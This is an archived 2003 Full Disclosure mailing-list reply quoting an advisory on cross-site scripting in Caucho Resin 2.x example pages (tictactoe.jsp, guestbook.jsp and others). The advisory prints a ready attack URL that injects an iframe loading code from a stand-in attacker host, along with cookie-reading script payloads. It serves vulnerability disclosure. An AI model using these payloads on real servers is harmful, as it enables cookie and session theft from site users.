Full Disclosure mailing list archives
Re: Caucho Resin 2.x - Cross Site Scripting
From: jelmer <jkuperus () planet nl>
Date: Sun, 19 Oct 2003 21:22:40 +0200
Donny, These are in the example applications, which any sane admin should disable right away, much like caucho-status These are basic procedures in setting up a server. --jelmer ----- Original Message ----- From: "morning_wood" <se_cur_ity () hotmail com> To: <full-disclosure () lists netsys com> Sent: Sunday, October 19, 2003 12:37 PM Subject: [Full-disclosure] Caucho Resin 2.x - Cross Site Scripting
----------------------------------------------------------------- - EXPL-A-2003-026 exploitlabs.com Advisory 026 - ----------------------------------------------------------------- -= Caucho Resin =- Donnie Werner Oct 18, 2003 Vunerability(s): ---------------- 1. XSS note: this is not http://www.securiteam.com/securitynews/5KP0O1F7FM.html http://www.securitytracker.com/alerts/2002/Jun/1004552.html Product: -------- Caucho Resin Httpd 2.x Reviews: -------- http://www.caucho.com/sales/customers.xtp Description of product: ----------------------- "ResinĀ® is a cutting-edge XML Application Server. It serves the fastest servlets and JSP." VUNERABILITY / EXPLOIT ====================== default port 8080 ( others used ) affected scripts: env.jsp form.jsp session.jsp tictactoe.jsp
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
IPT> the above is only an example, all cookie and session stealing Cross Site Scripting was possible. guestbook.jsp allows persistant XSS enter evil javascript in "name" and "comment" fields it is then re-rendered upon revisit Local: ------ nay Remote: ------- yeh Vendor Fix: ----------- Versions 3.x dont have the examples included Vendor Contact: --------------- bugs () caucho com Concurrent with this advisory Credits: -------- Donnie Werner CTO E2 Labs http://e2-labs.cpm morning_wood () e2-labs com http://nothackers.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Caucho Resin 2.x - Cross Site Scripting morning_wood (Oct 19)
- Re: Caucho Resin 2.x - Cross Site Scripting jelmer (Oct 19)
- Re: Caucho Resin 2.x - Cross Site Scripting Gregory Steuck (Oct 20)
- Re: Caucho Resin 2.x - Cross Site Scripting jelmer (Oct 20)
- Re: Caucho Resin 2.x - Cross Site Scripting Gregory Steuck (Oct 20)
- Re: Caucho Resin 2.x - Cross Site Scripting jelmer (Oct 19)